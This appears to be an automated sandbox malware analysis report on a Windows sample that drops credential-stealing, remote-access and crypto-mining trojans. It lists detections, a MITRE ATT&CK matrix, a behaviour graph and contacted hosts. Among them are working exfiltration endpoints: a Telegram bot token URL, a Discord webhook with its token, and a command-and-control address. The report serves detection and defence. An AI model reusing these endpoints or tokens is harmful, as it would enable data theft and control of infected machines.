                                  Source: Yara matchFile source: 00000045.00000002.2932877358.0000000003549000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000007.00000003.1702500179.00000000076F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000E.00000003.1722722653.0000000004E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  Source: Yara matchFile source: Process Memory Space: based.exe PID: 6828, type: MEMORYSTR
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 30.0.ChainComServermonitor.exe.4b0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.4e4e6ea.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 14.3.svchost.exe.564e6ea.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Recovery\HpQPPZazcv.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Defender\en-US\based.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Recovery\powershell.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\ProgramData\svchost.exe, type: DROPPED
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information111
                                  Scripting
                                  Valid Accounts441
                                  Windows Management Instrumentation
                                  111
                                  Scripting
                                  1
                                  Abuse Elevation Control Mechanism
                                  51
                                  Disable or Modify Tools
                                  1
                                  OS Credential Dumping
                                  2
                                  System Time Discovery
                                  1
                                  Taint Shared Content
                                  1
                                  Archive Collected Data
                                  1
                                  Web Service
                                  Exfiltration Over Other Network Medium1
                                  Data Encrypted for Impact
                                  CredentialsDomainsDefault Accounts2
                                  Native API
                                  11
                                  DLL Side-Loading
                                  11
                                  DLL Side-Loading
                                  11
                                  Deobfuscate/Decode Files or Information
                                  1
                                  Credential API Hooking
                                  3
                                  File and Directory Discovery
                                  Remote Desktop Protocol3
                                  Data from Local System
                                  3
                                  Ingress Tool Transfer
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts113
                                  Command and Scripting Interpreter
                                  1
                                  Windows Service
                                  1
                                  Windows Service
                                  1
                                  Abuse Elevation Control Mechanism
                                  Security Account Manager158
                                  System Information Discovery
                                  SMB/Windows Admin Shares1
                                  Credential API Hooking
                                  11
                                  Encrypted Channel
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts1
                                  Service Execution
                                  421
                                  Registry Run Keys / Startup Folder
                                  311
                                  Process Injection
                                  21
                                  Obfuscated Files or Information
                                  NTDS451
                                  Security Software Discovery
                                  Distributed Component Object Model1
                                  Clipboard Data
                                  4
                                  Non-Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts3
                                  PowerShell
                                  Network Logon Script421
                                  Registry Run Keys / Startup Folder
                                  21
                                  Software Packing
                                  LSA Secrets2
                                  Process Discovery
                                  SSHKeylogging15
                                  Application Layer Protocol
                                  Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                  DLL Side-Loading
                                  Cached Domain Credentials351
                                  Virtualization/Sandbox Evasion
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  File Deletion
                                  DCSync1
                                  Application Window Discovery
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                                  Rootkit
                                  Proc Filesystem1
                                  System Network Configuration Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt133
                                  Masquerading
                                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron351
                                  Virtualization/Sandbox Evasion
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                                  Process Injection
                                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                                  Hidden Files and Directories
                                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1485736 Sample: 8Ck8T5qRcC.exe Startdate: 01/08/2024 Architecture: WINDOWS Score: 100 158 api.telegram.org 2->158 160 discord.com 2->160 162 ip-api.com 2->162 200 Found malware configuration 2->200 202 Antivirus detection for dropped file 2->202 204 Sigma detected: Capture Wi-Fi password 2->204 208 29 other signatures 2->208 15 8Ck8T5qRcC.exe 6 2->15         started        18 HpQPPZazcv.exe 2->18         started        22 powershell.exe 2->22         started        24 2 other processes 2->24 signatures3 206 Uses the Telegram API (likely for C&C communication) 158->206 process4 dnsIp5 134 C:\ProgramData\Microsoft\hacn.exe, PE32+ 15->134 dropped 136 C:\ProgramData\Microsoft\based.exe, PE32+ 15->136 dropped 26 hacn.exe 13 15->26         started        30 based.exe 22 15->30         started        164 194.58.42.154, 49739, 49740, 49741 AS-REGRU Russian Federation 18->164 138 C:\Users\user\Desktop\xiBLBWku.log, PE32 18->138 dropped 140 C:\Users\user\Desktop\tcMmcUQx.log, PE32 18->140 dropped 142 C:\Users\user\Desktop\tKFUOyWv.log, PE32 18->142 dropped 144 19 other malicious files 18->144 dropped 210 Antivirus detection for dropped file 18->210 212 Multi AV Scanner detection for dropped file 18->212 214 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->214 220 3 other signatures 18->220 216 Loading BitLocker PowerShell Module 22->216 32 conhost.exe 22->32         started        218 Found direct / indirect Syscall (likely to bypass EDR) 24->218 34 conhost.exe 24->34         started        36 sc.exe 24->36         started        38 sc.exe 24->38         started        40 3 other processes 24->40 file6 signatures7 process8 file9 106 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 26->106 dropped 108 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 26->108 dropped 110 C:\Users\user\AppData\Local\Temp\...\s.exe, PE32 26->110 dropped 118 8 other files (7 malicious) 26->118 dropped 228 Multi AV Scanner detection for dropped file 26->228 230 Machine Learning detection for dropped file 26->230 42 hacn.exe 26->42         started        112 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 30->112 dropped 114 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 30->114 dropped 116 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 30->116 dropped 120 16 other files (15 malicious) 30->120 dropped 232 Very long command line found 30->232 234 Modifies Windows Defender protection settings 30->234 236 Adds a directory exclusion to Windows Defender 30->236 238 2 other signatures 30->238 44 based.exe 1 101 30->44         started        signatures10 process11 dnsIp12 48 cmd.exe 1 42->48         started        166 api.telegram.org 149.154.167.220, 443, 49748 TELEGRAMRU United Kingdom 44->166 168 discord.com 162.159.136.232, 443, 49747 CLOUDFLARENETUS United States 44->168 170 ip-api.com 208.95.112.1, 49744, 80 TUT-ASUS United States 44->170 250 Found many strings related to Crypto-Wallets (likely being stolen) 44->250 252 Tries to harvest and steal browser information (history, passwords, etc) 44->252 254 Modifies Windows Defender protection settings 44->254 256 5 other signatures 44->256 51 cmd.exe 44->51         started        53 cmd.exe 44->53         started        55 cmd.exe 44->55         started        57 14 other processes 44->57 signatures13 process14 signatures15 172 Wscript starts Powershell (via cmd or directly) 48->172 174 Very long command line found 48->174 176 Encrypted powershell cmdline option found 48->176 184 3 other signatures 48->184 59 s.exe 5 48->59         started        63 conhost.exe 48->63         started        73 2 other processes 51->73 178 Adds a directory exclusion to Windows Defender 53->178 65 powershell.exe 53->65         started        67 conhost.exe 53->67         started        180 Modifies Windows Defender protection settings 55->180 75 2 other processes 55->75 182 Tries to harvest and steal WLAN passwords 57->182 69 getmac.exe 57->69         started        71 powershell.exe 57->71         started        77 23 other processes 57->77 process16 file17 122 C:\ProgramData\svchost.exe, PE32 59->122 dropped 124 C:\ProgramData\setup.exe, PE32+ 59->124 dropped 240 Multi AV Scanner detection for dropped file 59->240 242 Drops PE files with benign system names 59->242 79 svchost.exe 59->79         started        83 setup.exe 59->83         started        244 Loading BitLocker PowerShell Module 65->244 246 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 69->246 248 Writes or reads registry keys via WMI 69->248 85 csc.exe 73->85         started        signatures18 process19 file20 146 C:\Users\user\...\ChainComServermonitor.exe, PE32 79->146 dropped 148 pFG3Duil1NAbFHoInF...Rvb98S0ewJA0VkW.vbe, data 79->148 dropped 150 C:\Users\user\...\oGgyulsi03j6EO3sjCC.bat, ASCII 79->150 dropped 186 Antivirus detection for dropped file 79->186 188 Multi AV Scanner detection for dropped file 79->188 190 Machine Learning detection for dropped file 79->190 87 wscript.exe 79->87         started        152 C:\Users\user\AppData\...\wxyubnjmnlae.tmp, PE32+ 83->152 dropped 154 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 83->154 dropped 192 Writes to foreign memory regions 83->192 194 Modifies the context of a thread in another process (thread injection) 83->194 196 Found hidden mapped module (file has been removed from disk) 83->196 198 3 other signatures 83->198 156 C:\Users\user\AppData\Local\...\eodmidm4.dll, PE32 85->156 dropped 90 cvtres.exe 85->90         started        signatures21 process22 signatures23 224 Wscript starts Powershell (via cmd or directly) 87->224 226 Windows Scripting host queries suspicious COM object (likely to drop second stage) 87->226 92 cmd.exe 87->92         started        process24 process25 94 ChainComServermonitor.exe 92->94         started        98 conhost.exe 92->98         started        file26 126 C:\Windows\Prefetch\HpQPPZazcv.exe, PE32 94->126 dropped 128 C:\Users\user\Desktop\xnytOABw.log, PE32 94->128 dropped 130 C:\Users\user\Desktop\xGttiZnp.log, PE32 94->130 dropped 132 26 other malicious files 94->132 dropped 258 Multi AV Scanner detection for dropped file 94->258 260 Creates an undocumented autostart registry key 94->260 262 Creates autostart registry keys with suspicious values (likely registry only malware) 94->262 264 5 other signatures 94->264 100 csc.exe 94->100         started        signatures27 process28 file29 104 C:\Windows\...\SecurityHealthSystray.exe, PE32 100->104 dropped 222 Infects executable files (exe, dll, sys, html) 100->222 signatures30

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  8Ck8T5qRcC.exe53%ReversingLabsWin32.Trojan.Generic
                                  8Ck8T5qRcC.exe38%VirustotalBrowse
                                  8Ck8T5qRcC.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files\Windows Defender\en-US\based.exe100%AviraHEUR/AGEN.1323342
                                  C:\Recovery\powershell.exe100%AviraHEUR/AGEN.1323342
                                  C:\ProgramData\setup.exe100%AviraTR/CoinMiner.lnxah
                                  C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe100%AviraHEUR/AGEN.1323342
                                  C:\Recovery\HpQPPZazcv.exe100%AviraHEUR/AGEN.1323342
                                  C:\Users\user\AppData\Local\Temp\O7MNNZ56x3.bat100%AviraBAT/Delbat.C
                                  C:\Program Files\Google\Chrome\updater.exe100%AviraTR/CoinMiner.lnxah
                                  C:\ProgramData\svchost.exe100%AviraVBS/Runner.VPG
                                  C:\Program Files\Windows Defender\en-US\based.exe100%Joe Sandbox ML
                                  C:\Recovery\powershell.exe100%Joe Sandbox ML
                                  C:\ProgramData\setup.exe100%Joe Sandbox ML
                                  C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe100%Joe Sandbox ML
                                  C:\Recovery\HpQPPZazcv.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe100%Joe Sandbox ML
                                  C:\ProgramData\svchost.exe100%Joe Sandbox ML
                                  C:\ProgramData\Microsoft\hacn.exe100%Joe Sandbox ML
                                  C:\Program Files\Google\Chrome\updater.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\Program Files\Windows Defender\en-US\based.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\ProgramData\Microsoft\based.exe55%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\Microsoft\hacn.exe71%ReversingLabsWin64.Trojan.Generic
                                  C:\ProgramData\setup.exe71%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\ProgramData\svchost.exe61%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                  C:\Recovery\HpQPPZazcv.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Recovery\powershell.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe21%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\VCRUNTIME140.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\libcrypto-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\libffi-7.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\libssl-1_1.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\sqlite3.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe92%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                  C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp92%ReversingLabsWin64.Trojan.SilentCryptoMiner
                                  C:\Users\user\Desktop\AwjkpWnj.log12%ReversingLabs
                                  C:\Users\user\Desktop\BLFrfvoX.log12%ReversingLabs
                                  C:\Users\user\Desktop\EqAsTbqX.log17%ReversingLabs
                                  C:\Users\user\Desktop\FuissdNI.log12%ReversingLabs
                                  C:\Users\user\Desktop\GLhaJjhM.log12%ReversingLabs
                                  C:\Users\user\Desktop\IsmZtopJ.log12%ReversingLabs
                                  C:\Users\user\Desktop\JSejfBbH.log8%ReversingLabs
                                  C:\Users\user\Desktop\JmBJbHgR.log17%ReversingLabs
                                  C:\Users\user\Desktop\JryrolxS.log12%ReversingLabs
                                  C:\Users\user\Desktop\KWThvPSL.log12%ReversingLabs
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  discord.com0%VirustotalBrowse
                                  ip-api.com0%VirustotalBrowse
                                  api.telegram.org2%VirustotalBrowse
                                  SourceDetectionScannerLabelLink
                                  https://www.avito.ru/0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                                  https://www.leboncoin.fr/0%URL Reputationsafe
                                  https://weibo.com/0%URL Reputationsafe
                                  https://www.msn.com0%URL Reputationsafe
                                  https://nuget.org/nuget.exe0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                                  https://www.amazon.ca/0%URL Reputationsafe
                                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                                  http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                                  https://www.amazon.com/0%URL Reputationsafe
                                  https://contoso.com/Icon0%URL Reputationsafe
                                  http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
                                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                                  https://MD8.mozilla.org/1/m0%URL Reputationsafe
                                  https://bugzilla.mo0%URL Reputationsafe
                                  http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
                                  http://ocsp.sectigo.com00%URL Reputationsafe
                                  https://www.python.org/download/releases/2.3/mro/.0%URL Reputationsafe
                                  https://contoso.com/License0%URL Reputationsafe
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
                                  https://account.bellmedia.c0%URL Reputationsafe
                                  http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-60%URL Reputationsafe
                                  https://login.microsoftonline.com0%URL Reputationsafe
                                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                                  https://contoso.com/0%URL Reputationsafe
                                  https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
                                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                                  https://sectigo.com/CPS00%URL Reputationsafe
                                  http://ocsp.thawte.com00%URL Reputationsafe
                                  https://www.wykop.pl/0%URL Reputationsafe
                                  https://twitter.com/0%URL Reputationsafe
                                  https://www.olx.pl/0%URL Reputationsafe
                                  https://support.mozilla.org/products/firefox0%URL Reputationsafe
                                  https://github.com/Blank-c/BlankOBF0%Avira URL Cloudsafe
                                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                                  https://www.amazon.fr/0%URL Reputationsafe
                                  https://api.telegram.org/bot%s/%s0%Avira URL Cloudsafe
                                  https://www.openssl.org/H0%URL Reputationsafe
                                  https://aka.ms/pscore680%URL Reputationsafe
                                  https://python.org/dev/peps/pep-0263/0%Avira URL Cloudsafe
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%Avira URL Cloudsafe
                                  http://www.microsoftCHROME~2.TXTy./0%Avira URL Cloudsafe
                                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                                  https://tools.ietf.org/html/rfc2388#section-4.40%Avira URL Cloudsafe
                                  https://github.com/Blank-c/BlankOBF2%VirustotalBrowse
                                  https://api.telegram.org/bot%s/%s0%VirustotalBrowse
                                  https://python.org/dev/peps/pep-0263/0%VirustotalBrowse
                                  https://api.anonfiles.com/upload0%Avira URL Cloudsafe
                                  https://tools.ietf.org/html/rfc2388#section-4.40%VirustotalBrowse
                                  https://discord.com/api/v9/users/0%Avira URL Cloudsafe
                                  https://api.anonfiles.com/upload1%VirustotalBrowse
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%Avira URL Cloudsafe
                                  http://www.microsoftISPLA~1.PNGy.0%Avira URL Cloudsafe
                                  https://discord.com/api/v9/users/0%VirustotalBrowse
                                  http://json.org0%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2192#issuecomment-8218329630%VirustotalBrowse
                                  https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#0%VirustotalBrowse
                                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%Avira URL Cloudsafe
                                  http://crl.mic0%Avira URL Cloudsafe
                                  http://json.org0%VirustotalBrowse
                                  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy0%VirustotalBrowse
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L6880%VirustotalBrowse
                                  https://httpbin.org/0%Avira URL Cloudsafe
                                  https://github.com/Pester/Pester0%Avira URL Cloudsafe
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%Avira URL Cloudsafe
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader0%VirustotalBrowse
                                  http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5350%VirustotalBrowse
                                  http://tools.ietf.org/html/rfc6125#section-6.4.30%Avira URL Cloudsafe
                                  https://google.com/mail0%Avira URL Cloudsafe
                                  https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy0%VirustotalBrowse
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                                  https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUya0%Avira URL Cloudsafe
                                  https://httpbin.org/1%VirustotalBrowse
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%Avira URL Cloudsafe
                                  http://tools.ietf.org/html/rfc6125#section-6.4.30%VirustotalBrowse
                                  https://www.google.com/0%Avira URL Cloudsafe
                                  https://foss.heptapod.net/pypy/pypy/-/issues/35390%Avira URL Cloudsafe
                                  https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.0%Avira URL Cloudsafe
                                  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py0%VirustotalBrowse
                                  https://www.google.com/0%VirustotalBrowse
                                  http://google.com/0%Avira URL Cloudsafe
                                  https://foss.heptapod.net/pypy/pypy/-/issues/35390%VirustotalBrowse
                                  https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  discord.com
                                  162.159.136.232
                                  truetrueunknown
                                  ip-api.com
                                  208.95.112.1
                                  truefalseunknown
                                  api.telegram.org
                                  149.154.167.220
                                  truetrueunknown
                                  NameMaliciousAntivirus DetectionReputation
                                  https://discord.com/api/webhooks/1264025291794157628/Sz1WQEp-Y2XqBUw8OiovYJ-HSmiCmR36z5iq2VLDwzDIXt2tsN2CAivzv3lJ-Ow3IUyatrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://194.58.42.154/9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.phpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://api.telegram.org/bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocumentfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabbased.exe, 00000004.00000003.2357805259.00000201D0F0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Blank-c/BlankOBFbased.exe, 00000004.00000003.1697774111.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698372056.00000201D0741000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697774111.00000201D075D000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1699291343.00000201D07D4000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1697523584.00000201D0948000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1698004451.00000201D07C8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1701839731.00000201D07D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • 2%, Virustotal, Browse
